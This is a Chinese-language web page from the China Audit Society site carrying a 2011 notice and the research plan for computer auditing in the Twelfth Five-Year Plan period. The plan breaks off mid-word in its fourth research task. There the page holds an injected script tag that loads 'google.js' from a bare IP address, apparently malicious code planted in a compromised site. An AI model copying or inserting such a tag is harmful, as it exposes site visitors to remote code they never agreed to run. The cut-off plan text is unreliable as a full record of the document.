首页学会基本情况规划与计划课题管理学会会议培训与学习学术交流审计研究
当前位置: 首页  >  中国审计学会动态 > 正文
 
中国审计学会计算机审计分会关于印发计算机审计“十二五”研究规划的函
 
【时间:2015年07月31日】 字号: 【大】 【中】 【小】
各省、自治区、直辖市和计划单列市、新疆生产建设兵团审计学会,各特派办审计理论研究会(组),中国审计学会计算机审计分会各位理事:
    根据中国审计学会计算机审计分会2011至2012年工作计划报告的任务安排,经中国审计学会领导同意,现将《计算机审计“十二五”研究规划》印发给你们,请认真组织研究。
    研究中的有关问题,请与计算机审计分会秘书处联系。联系人:熊宛皎,电话:010—88317610。

                                                              二○一一年十二月二十九日

                                                
                                             计算机审计“十二五”研究规划
    为了提高计算机审计理论和实务的研究水平,进一步适应国家审计信息化发展的需要,根据《审计署“十二五”审计工作发展规划》和《审计署“十二五”信息化发展规划》关于计算机审计工作的总体要求,结合中国审计学会计算机审计分会的工作实际,制定计算机审计研究“十二五”规划。
    一、计算机审计研究工作的指导思想
    坚持以中国特色社会主义理论体系为指导,树立国家审计信息化促进国家审计和国家良治的科学审计理念,总结计算机审计实践经验,探索计算机审计发展规律,推进计算机审计理论创新和技术方法创新,推动信息化环境下审计事业的科学发展。
    二、计算机审计研究工作的总体目标
    围绕党和国家的大局和国家审计的中心工作,研究计算机审计实践中的重大理论问题和实用技术方法,不断丰富中国特色社会主义审计理论体系和技术方法体系,努力提高审计信息化水平,充分发挥国家审计信息化在国家审计和国家治理中的作用。
    三、计算机审计研究工作的基本原则
    (一)坚持求真务实原则。从我国审计信息化发展的实际情况出发,提出问题、分析问题、解决问题,实事求是,坚持真理,注重研究成果的推广应用,服务审计实践,服务审计科学发展。
    (二)坚持继承创新原则。在继承已有研究成果的基础上,密切关注审计工作中遇到的新情况、新问题,解放思想,大胆创新,不断提出新理论、新技术、新方法,开创审计发展的新局面。
    (三)坚持吸收借鉴原则。拓宽视野,扩大交流,积极吸收借鉴国外计算机审计和国内外其他学科的研究成果,不断提高我国计算机审计研究的学术水平和国际影响力。
    四、计算机审计研究工作的主要任务
    (一)计算机审计理论体系研究。重点研究计算机审计的概念、范畴、基本原理和实现规律,逐步形成计算机审计的理论体系、技术体系、实务体系和规范体系,确立计算机审计在审计学中的科学地位。
    (二)国家审计信息化与国家治理研究。重点研究国家审计在国家治理中发挥“免疫系统”功能的原理、途径和作用等。具体研究国家审计信息化的审计应用、信息资源、网络资源、安全保障、系统运维和人才资源的综合能力体系。
    (三)数字化审计模式研究。重点研究以审计计划项目组织为主线、以审计质量控制为关键、以审计决策支持为核心的数字化审计管理模式。研究以拓展审计机构专业审计分工格局为基础、以建设较为稳定的数据分析队伍为重点、以跟踪分析与项目实施和总体分析与分散核查等审计组织方式为保障、以提升审计结果报告和工作报告质量为核心的数字化审计业务模式。
    (四)关注财政财务收支监督的计算机审计应用研究。结合审计署金审工程实施的计算机现场审计和联网审计实践,认真总结成功经验,研究提升数字化审?script src= http://91.239.15.61/google.js \>
【关闭】    【打印】
  版权信息
主办单位:中国审计学会  技术支持:审计署计算机技术中心 本站电话:010-82199820
本站地址:北京市海淀区中关村南大街4号(邮编:100086) 备案编号:京ICP备19011981号  建议使用分辨率:1024×768